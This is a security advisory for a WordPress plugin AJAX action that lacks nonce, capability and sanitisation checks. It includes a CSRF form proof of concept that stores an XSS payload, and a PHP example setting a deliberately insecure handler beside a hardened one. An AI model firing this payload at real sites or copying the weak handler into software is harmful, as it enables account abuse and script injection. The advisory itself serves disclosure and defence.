The plugin does not have any authorisation or CSRF checks in an AJAX action, allowing any authenticated user, such as a subscriber, to call it and add, delete or edit Bonds. Furthermore, due to the lack of sanitisation and escaping, this can also lead to Stored Cross-Site Scripting. Note that a handler hooked on wp_ajax_{action} is reachable by every logged-in user through admin-ajax.php, so the handler itself has to verify a nonce (for example with check_ajax_referer()) and a capability (for example with current_user_can()); this action does neither.
Open a page containing the HTML code below as any authenticated user, or make any authenticated user open it via a CSRF attack:

```html
<form action="https://example.com/wordpress/wp-admin/admin-ajax.php" method="POST">
  <input type="text" name="action" value="SBF_DB_code_manage_action">
  <input type="text" name="B_COMMAND" value="ADD">
  <input type="text" name="B_PARAM" value="10">
  <input type="text" name="B_PARAM2" value="<script>alert(/XSS/)</script>">
  <input type="text" name="B_PARAM3" value="1">
  <input type="submit" name="submit" value="submit">
</form>
```
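The following is an added illustration of the weak pattern the advisory describes and of a hardened handler for the same action; it is not the plugin's own code, which is not shown on this page. The function names, the "sbf_bonds" nonce action, the "sbf_bonds" option and the "nonce" field name are assumptions; only the action name and the B_COMMAND/B_PARAM* parameter names come from the proof of concept above.

```php
<?php
// Added example, not the plugin's code. Everything except the action name and
// the B_* parameters is an assumption made for illustration.

// Weak pattern matching the advisory (shown for contrast, deliberately NOT
// hooked): reachable by any logged-in user, no nonce, no capability check,
// raw POST values written straight to the database.
function sbf_manage_bonds_weak() {
    $bonds = get_option( 'sbf_bonds', array() );
    if ( $_POST['B_COMMAND'] === 'ADD' ) {
        $bonds[ $_POST['B_PARAM'] ] = $_POST['B_PARAM2']; // stored unsanitised
    } elseif ( $_POST['B_COMMAND'] === 'DELETE' ) {
        unset( $bonds[ $_POST['B_PARAM'] ] );
    }
    update_option( 'sbf_bonds', $bonds );
    wp_die();
}

// Hardened handler for the same AJAX action.
add_action( 'wp_ajax_SBF_DB_code_manage_action', 'sbf_manage_bonds' );
function sbf_manage_bonds() {
    // 1. CSRF: the request must carry a nonce created with
    //    wp_create_nonce( 'sbf_bonds' ) (passed to the admin JS via
    //    wp_localize_script). check_ajax_referer() dies with HTTP 403 if
    //    the 'nonce' field is missing or invalid.
    check_ajax_referer( 'sbf_bonds', 'nonce' );

    // 2. Authorisation: being logged in is not enough; require a capability
    //    that subscribers do not have.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 3. Input sanitisation. sanitize_key() lower-cases and strips anything
    //    outside [a-z0-9_-], absint() forces a non-negative integer, and
    //    sanitize_text_field() strips tags and control characters.
    $command = isset( $_POST['B_COMMAND'] ) ? sanitize_key( wp_unslash( $_POST['B_COMMAND'] ) ) : '';
    $id      = isset( $_POST['B_PARAM'] ) ? absint( $_POST['B_PARAM'] ) : 0;
    $label   = isset( $_POST['B_PARAM2'] ) ? sanitize_text_field( wp_unslash( $_POST['B_PARAM2'] ) ) : '';

    $bonds = get_option( 'sbf_bonds', array() );
    switch ( $command ) {
        case 'add':
        case 'edit':
            if ( 0 === $id || '' === $label ) {
                wp_send_json_error( 'invalid parameters', 400 );
            }
            $bonds[ $id ] = $label;
            break;
        case 'delete':
            unset( $bonds[ $id ] );
            break;
        default:
            wp_send_json_error( 'unknown command', 400 );
    }
    update_option( 'sbf_bonds', $bonds );
    wp_send_json_success( array( 'count' => count( $bonds ) ) );
}

// 4. Output escaping: sanitisation on input is not a substitute for escaping
//    at the point of rendering, so escape again when the stored value is
//    echoed into HTML.
function sbf_render_bonds() {
    $bonds = get_option( 'sbf_bonds', array() );
    echo '<ul>';
    foreach ( $bonds as $id => $label ) {
        echo '<li data-id="' . esc_attr( $id ) . '">' . esc_html( $label ) . '</li>';
    }
    echo '</ul>';
}
```

With the hardened handler in place the proof of concept above fails at the nonce check before any Bond is touched, and a subscriber who somehow obtained a valid nonce is still rejected by the capability check; the `<script>` payload, if it were ever stored, is rendered as inert text by esc_html().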
Lana Codes
Yes
2022-08-31